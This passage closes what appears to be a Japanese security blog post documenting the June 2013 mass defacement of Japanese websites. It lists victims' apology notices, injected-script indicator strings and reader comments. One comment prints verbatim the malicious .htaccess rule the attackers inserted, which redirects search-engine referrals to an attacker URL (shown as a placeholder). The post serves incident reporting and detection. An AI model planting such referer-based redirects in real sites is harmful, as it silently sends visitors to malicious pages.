*23:(PDF)当社ホームページの改ざんに関するお詫びとご報告,アジュバンコスメジャパン,2013/06/06アクセス
*24:ウェブサイト改ざんのご報告とお詫び,情報ネットワーク法学会,2013/06/04アクセス:魚拓
*25:【重要】県立玉城青少年の家ホームページ改ざんについて,沖縄県,2013/06/06アクセス:魚拓
*26:本校ウェブサイトへの不正アクセスについて,山崎県立塩山高等学校,2013/06/04アクセス:魚拓
*27:当Webサイト改ざんに関する報告とお詫び,フジ印刷,2013/06/06アクセス:魚拓
*28:ウェブサイト改ざんのご報告とお詫び,横浜市,2013/06/06アクセス:魚拓
*29:久良岐 お詫び,シグマコミュニケーションズ,2013/06/05アクセス:魚拓
*30:らんの里堂ヶ島ホームページに関するお詫びとお知らせ,日比谷アミューズメントプランニング,2013/06/04アクセス:魚拓
*31:公式サイト改ざんに関するお詫びとご報告,愛知県バドミントン協会,2013/06/05アクセス:魚拓
*32:当院ホームページの不正な改変事案に関する注意喚起とお詫びとお願い,東京大学医学部付属病院,2013/06/05アクセス:魚拓
*33:シンニチプレミアムストアご利用のお客様へ改ざんに関するお詫びとお知らせ,ときめきドットコム,2013/06/04アクセス:魚拓
*34:当機構ホームページの改ざんについて,姫路市まちづくり振興機構,2013/06/04アクセス:魚拓
*35:「当サイトの改ざんに関するお詫び」,幼児教育実践研究所,2013/06/06アクセス:魚拓
*36:弊社ホームページの改ざんに関するお詫び,テレワークマネジメント,2013/06/05アクセス:魚拓
*37:改ざん被害が発生しました…申し訳ございません。[カラオケスクールお知らせ],☆脱!カラオケコンプレックス,2013/06/04アクセス:魚拓
*38:ホームページ不正改ざんについてのお詫び,エフエム群馬,2013/06/04アクセス:魚拓
*39:ホームページ再開にあたってのご報告,エフエム群馬,2013/06/07アクセス:魚拓
*40:仙台市農作物有害鳥獣対策協議会ホームページの一部が改ざんされました,仙台市,2013/06/04アクセス:魚拓
*41:ご連絡。,ウェブメッセージ,2013/06/06アクセス:魚拓
*42:本学「ホームページ」に関するお詫びとお知らせ,北海道文教大学,2013/06/04アクセス:魚拓
*43:神戸市立桃山台児童館のホームページを閲覧された方へ,神戸市,2013/06/05アクセス:魚拓
*44:日本馬術連盟ホームページの改ざん被害と復旧のご報告,日本馬術連盟,2013/06/05アクセス:魚拓
*45:弊社ホームページの改ざんに関するお詫び,ゆたぷろ,2013/06/05アクセス:魚拓
*46:ホームページ改ざんに関するお知らせとお詫び,能登空港利用促進協議会,2013/06/06アクセス:魚拓
*47:現在、「札幌市ワーク・ライフ・バランス推進事業」HPが閲覧できなくなっています。,札幌市,2013/06/06アクセス:魚拓
*48:札幌市HPがウイルス感染 閲覧者に確認呼び掛け,北海道新聞,2013/06/06アクセス:魚拓
*49:(PDF)当社の関連ホームページをご覧になった皆さまへのお願い,日本想像教育研究所,2013/06/06アクセス
*50:【ホームページ改ざんに関するお詫び − 復旧いたしました】,ビブリオポリ,2013/06/06アクセス:魚拓
*51:【当社サイト改竄に関するお詫び】,アーク,2013/06/06アクセス:魚拓
*52:弊社サイトの改ざんに関するお詫び,アール・ビー・コントロールズ,2013/06/06アクセス:魚拓
*53:ホームページ改ざんに関するお知らせとお詫び,エスペック,2013/06/06アクセス:魚拓
*54:札幌市観光情報サイト「ようこそさっぽろ」停止のお知らせ,札幌市,2013/06/07アクセス:魚拓
*55:札幌市の観光HP、不正アクセス受け閉鎖,読売新聞,2013/06/07アクセス:魚拓
*56:ホームページ一時閉鎖のお知らせ,早稲田スポーツ新聞会,2013/06/07アクセス:魚拓
*57:重要なお知らせ(サイト改ざんの被害について),寺本法律会計事務所,2013/06/07アクセス:魚拓
*58:(PDF)ホームページ改 ホームページ改ざんに関するお知らせとお詫び,函館信用金庫,2013/06/07アクセス
*59:(PDF)当社ホームページ改ざんに関するお詫びとご報告,トヨシマ,2013/06/07アクセス
*60:ホームページ改ざんに関するお知らせ・一時的な閉鎖とお詫び,浜松グリーンウェーブ,2013/06/07アクセス:魚拓
*61:浜松グリーンウェーブ株式会社ウェブサイトへの不正アクセスと改ざん被害の発生について,浜松市,2013/06/07アクセス:魚拓
*62:【当社サイト改竄に関するお詫び】,アーク,2013/06/07アクセス:魚拓
*63:【当社サイト改竄に関するお詫び】,アーク,2013/06/07アクセス:魚拓
*64:ホームページアクセス不能についてのお詫び,上毛新聞TRサービス,2013/06/07:魚拓
*65:(PDF)コンピュータウイルス感染のご報告とお詫び,北恵,2013/06/07アクセス
*66:『日報webシステム』サイト改ざんに関する報告とお詫び,アップフィールド,2013/06/07アクセス:魚拓
*67:弊社サイト改ざんに関するお詫びとご説明,一幸陶苑,2013/06/07アクセス:魚拓
*68:AT-X公式ホームページ改ざんに関するお知らせとお詫び,エー・ティー・エックス,2013/06/07アクセス:魚拓
*69:弊社サイトのウィルス感染に関するお詫びとご報告,ミノウラ,2013/06/07アクセス:魚拓
*70:サイト復活しました!,日本デオドール,2013/06/07アクセス:魚拓
*71:【重要】大富士フットボールクラブホームページは安全に閲覧していただけます。,2013/06/07アクセス:魚拓
*72:ファイル改ざん,葉鍼灸院,2013/06/07アクセス:魚拓
*73:ホームページのコンピューターウイルス感染のご報告とお詫び,板橋区立成増小学校支援地域本部,2013/06/07アクセス:魚拓
*74:【CRAZY TVよりホームページに関するお詫びとお知らせ】,CRAZY TV,2013/06/09アクセス:魚拓
*75:ホームページに関するお知らせとお詫び,かなえるリンク,2013/06/09アクセス:魚拓
*76:ホームページ改ざんに関するお知らせとお詫び,緑秀会田無病院2013/06/09アクセス:魚拓
*77:WEBサイト改ざんに関するお詫びとお知らせ,ドゥ・ハウス,2013/06/09:魚拓
*78:ホームページ改ざんに関するお詫びとお知らせ,札幌静修高等学校,2013/06/09アクセス:魚拓
*79:緊急システムメンテナンスのお知らせ,日本文化出版株式会社,2013/06/09アクセス:魚拓
*80:(PDF)ホームページ改ざんに関するお知らせとお詫び,海洋研究開発機構,2013/06/09アクセス
*81:「当サイトの改ざんに関するお詫び」,ゑびすや,2013/06/09アクセス:魚拓
*82:マルウェア警告に関するお詫びとお願い,すみだ産業会館,2013/06/09アクセス:魚拓
*83:電子図書室サービス改ざんに関するお詫びとお知らせ,地盤工学会,2013/06/09アクセス
*84:(PDF)不正アクセスによるホームページの改ざんに関するお詫び,愛知・豊川用水振興協会,2013/06/10アクセス
*85:弊社サイトの改ざんに関するお詫び,栄信電気工業,2013/06/10アクセス:魚拓
*86:当サイトの、全一時停止について・・・,登録紹介宣伝あくせすくん,2013/06/10アクセス:魚拓
*87:当社ホームページのウィルス感染に関するお詫びとお知らせ,日本赤十字社,2013/06/10アクセス:魚拓
*88:当サイト改ざんに関するお知らせとお詫び,HKS,2013/06/11アクセス:魚拓
*89:(PDF)重要なお知らせ ホームページ改ざんに関するお知らせとお詫び,石川県教職員互助会,2013/06/11アクセス
*90:(PDF)弊社ホームページ改ざんに関するお詫びとご報告,アクア,2013/06/11アクセス
*91:[重要なお知らせ]ホームページ改ざんに関するお知らせとお詫び,国立民族学博物館,2013/06/11アクセス:魚拓
*92:当事務所HP改ざんに関するお詫びとお知らせ,長谷川敬税理士事務所,2013/06/11アクセス:魚拓
*93:ホームページ改ざんに関するお知らせとお詫び,TokiwagiFC Fan,2013/06/11アクセス:魚拓
*94:☆友の会HP再開☆,東京こけし友の会,2013/06/11アクセス:魚拓
*95:05月28日から同月31日にかけ、下記3サイトが海外から不正アクセスと改ざんを受けました。,ΜΟΟΥΣΕΊΟΝ,2013/06/11アクセス:魚拓
*96:<重要> 当社ホームページ改ざんに関するお詫び,松菱金属工業,2013/06/13アクセス:魚拓
*97:お客様にお詫びとお願い,日本グラフィックサービス工業会,2013/06/13アクセス:魚拓
*98:「当サイトの改ざんに関するお詫び」,盛岡三菱自動車販売,2013/06/13アクセス:魚拓
*99:ホームページ改ざんに関するお知らせ,北海道文化財団,2013/06/13アクセス:魚拓
*100:お詫びとお知らせ,現代屋,2013/06/13アクセス:魚拓
*101:不正アクセスによるサイト改ざんについて,さうすウェーブ,2013/06/13アクセス:魚拓
*102:当院ウェブサイト改ざんに関するお知らせとお詫び,湘南鎌倉総合病院,2013/06/13アクセス:魚拓
*103:今回の改ざんで埋め込まれるJavaScriptとして報告されている特定の文字列の一部(『0c0896』や『catch(d21vd12v)』『ps="split";asd=function』)がGoogleの検索履歴に表示されるキャッシュに残っていたサイト
*104:検索で引っ掛かる場合の多くがこの毒入れ失敗パターンだとか。
*105:ただし相当数のサイトで改ざんされた時期が重なっており、人為的に行うのは相応の人数がいなければ難しいように思います。
*106:他には「ソフトウェアの脆弱性が放置されていた」、「単純なID、パスワードを使っていた」、「そもそも誰でも更新できる状況だった」も原因として考えられるでしょう。
- Twitter / @matcha445
- wakatonoの戯れメモ - あちこちで改ざん?
- Twitter / @Keisuke1234567
- Twitter / @hack_japan
- Twitter / @sotaromi8
- Twitter / @msaitotypeR
- Twitter / @RC31E
- Twitter / @kat21
- Twitter / @maplefish
- Twitter / @maida01
- Twitter / @tspeedstar
- まっちゃだいふくの日記★とれんどふりーく★ - 日本のWebサイト改...
- Twitter / @YoshihideMayumi
- Twitter / @ham68616d
- Twitter / @hirogoro62
- Twitter / @girigiribauer
- Twitter / @ys_masa
- Twitter / @takasi_sns
- Twitter / @Jitensha_sougyo
- Twitter / @sigh_too
- Twitter / @hannin_yasu
- Twitter / @merio_h
- 酔っ払いの独り言 - 2013年06月05日のツイート
- wakatonoの戯れメモ - 改ざんを受けた際の対策/改ざんされてないサ...
- Twitter / @benri_koujishi
- Twitter / @namihei_jodee
- Twitter / @440design
- Twitter / @mumiso
- Twitter / @keisuke_n
- Twitter / @bleu48
- Twitter / @tea_kc
- Twitter / @mami_6
- 相次ぐWeb改ざん被害 遅れる対応
- Twitter / @haijimaoyaji
- Twitter / @elmowish
- Twitter / @camelus_ferus
- 【お詫び・追記】 改ざん被害が発生しました。
- Twitter / @Babibubebon39
- Twitter / @shinyanomura
- Twitter / @DARL_Japan
- Twitter / @PigPokePoke
- Twitter / @nagamac
- Twitter / @superbacker
- Twitter / @trastarize
- Twitter / @mash1025
MASAKI 2013/06/05 22:18 .htaccessに追記されているのも確認しました。
追記内容は以下の通りです。
#0c0896#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://転送先URL [R=301,L]
</IfModule>
#/0c0896#
piyokango 2013/06/06 02:29 情報ありがとうございます。記事中に引用させていただきました。
MASAKI 2013/06/06 12:24 掲載ありがとうございます。
私の方でリダイレクト処理の追記を現在確認しているファイルの拡張子は「.html」「.php」「.js」「.json」「.tpl」です。
「.json」「.tpl」は見落としがちかと思いますので、追加情報になるのかわかりませんが続けてコメントさせていただきました。
piyokango 2013/06/06 13:00 たびたび貴重な情報をありがとうございます。
改ざん対象として確認されている拡張子の一覧に頂いた情報を追加させていただきました。
カラオケ先生♪ 2013/06/06 15:33 piyokangoさん初めまして♪改ざんサイトのリストに入っています
「☆脱!カラオケコンプレックス」運営者のカラオケ先生こと北森@Arcadiaと申します。
調査を続けたところ、ウィルス対策ソフトに引っかからない、
JAVAの脆弱性をついて侵入するアドウェアらしきものが発見されました。
おそらくこれに私のFTP通信をロギングされていたものと思われます。
調査結果は後日ブログかサイトに追記いたします。
のちほど、こちらのサイトへのリンクを貼らせて下さい。
よろしくお願いいたします。
piyokango 2013/06/06 17:33 こんにちは。ご連絡ありがとうございます。
もし検体が確保できるようであれば、ハッシュ値やVirustotalのスキャン結果を共有頂けると大変ありがたいです。
Sasurai 2013/06/08 07:37 大変有用な情報かと思いますが、イラスト中の「攻撃者」のイメージがFreeBSDプロジェクトのマスコットキャラクターに似ており、一般の方から誤解を受けるのではないかと思います。